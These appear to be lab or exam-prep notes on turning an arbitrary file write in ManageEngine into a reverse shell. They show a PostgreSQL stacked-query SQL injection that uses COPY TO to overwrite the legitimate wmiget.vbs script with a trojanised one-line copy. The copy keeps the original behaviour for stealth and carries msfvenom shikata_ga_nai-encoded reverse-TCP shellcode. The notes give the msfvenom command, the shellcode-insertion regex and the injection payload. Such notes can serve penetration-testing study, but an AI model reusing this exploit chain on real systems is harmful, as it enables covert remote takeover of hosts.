# Reverse Shell 1: VBS

With our arbitrary file write vulnerability, we hope to gain a reverse shell in our target system. The first method of doing this is to hijack the functionality of the manage engine application. 

We create a monitor against the windows host itself in Manage Engine, then check process monitor (filter path contains VBS) to check what VBS scripts are run. We find that the script `wmiget.vbs` at the path `.\working\conf\application\scripts\wmiget.vbs` .

We want a malicious copy of `wmiget.vbs` with a reverse shell to exploit. To maintain the original functionality for stealth, by inserting our payload into a large **one-line** VB script entry. 

- One-liner is due to postgreSQL’s COPY TO function being unable to process newline characters.
- Base64 encode payload to deal with special characters, and URL encode the payload to ensure it does not get mangled (i.e. `+` will be interpreted as spaces)
- Since a Base64 encoded payload may be quite large, change method from GET to POST, since server re-routes POST requests as GETs.

## VBS Script

Use regex to find-replace on VBS script to generate 1-liner

- Remove Comments: `'.*`
- Continuation lines (VBS equivalent of python ```): `<space>_.*?\n` (Remember to check matches newline)
- Remove tabs: `\t`
- Replace `\n` with newline character`:` (note that for linux pasted into windows, should be replacing `\r\n`)
- After modifying our VBS script, can use `script .\wmiget.vbs` to verify
- After this, we generate an MSF venom shellcode on Kali and insert the shellcode just before the termination command `WScript.Quit(0);`

```python
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -e x86/shikata_ga_nai -f vbs > {filename}
script = re.sub(r'::(?=WScript.Quit\(0\))', f':{shellcode}:', script)
# Use forward lookahead to perform regex insertion/replacement operation. 
```

## Sending VBS Script

```python
userId = f"1;COPY+(SELECT+convert_from(decode($${content_encoded}$$,$$base64$$),$$utf-8$$))+TO+$${filePath}$$;--+"
```